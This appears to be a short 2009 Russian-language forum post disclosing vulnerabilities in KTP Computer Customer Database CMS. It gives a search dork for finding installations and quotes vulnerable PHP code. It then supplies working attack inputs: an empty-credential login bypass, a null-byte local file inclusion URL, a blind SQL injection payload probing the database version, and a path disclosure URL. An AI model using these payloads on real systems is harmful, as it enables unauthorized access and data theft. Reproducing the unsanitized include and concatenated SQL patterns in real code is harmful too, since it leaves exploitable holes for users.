Уязвимости KTP Computer Customer Database CMS Product : KTP Computer Customer Database CMS Dork : "KTPCCD & KTPotG ©2008 Keith Thibodeaux" Site: http://sourceforge.net/project/showfiles.php?group_id=245189 Founded by: Dimi4 Date : 12.04.09 Auth bypass [pages/login.php] Вот такая вот корявая функция. Проверяет только пароль: PHP: if ($_GET['a'] == "login") { $lname = $_POST['lname']; $lpass = md5($_POST['lpass']); $q = mysql_query("SELECT * FROM techs WHERE tloginname = '$lname'"); $result = mysql_fetch_array($q); if ($lpass == $result['tloginpass']) { $_SESSION['tid'] = $result['tid']; $_SESSION['loggedin'] = "1"; $_SESSION['tname'] = $result['tfname'] . " " . $result['tlname']; $lin = 1; $template->assign('name', $_SESSION['tname']); $template->assign('id', $_SESSION['tid']); $template->assign('func', "in"); $template->display('login.tpl'); } else { echo "login failed"; } Логинимся с пустыми логином и паролем. Local File Include [index.php] PHP: if (isset($_GET['p'])) { include 'pages/' . $_GET['p'] . '.php'; } else { include 'pages/index.php'; } http://localhost/ktp/?p={PATH}%00 Blind SQL-inj [index.php] PHP: function gettech($tid) { if ($result = mysql_query("SELECT * FROM techs WHERE tid = '$tid'")) { $tech = mysql_fetch_array($result); return $tech; } else { echo mysql_error(); } } http://localhost/ktp/?p=tech&a=vtech&tid=1'+and+substring(@@version,1,1)=[num]-- Full Path Disclosure [index.php] Code: http://localhost/ktp/pages/tech/changepassword.php
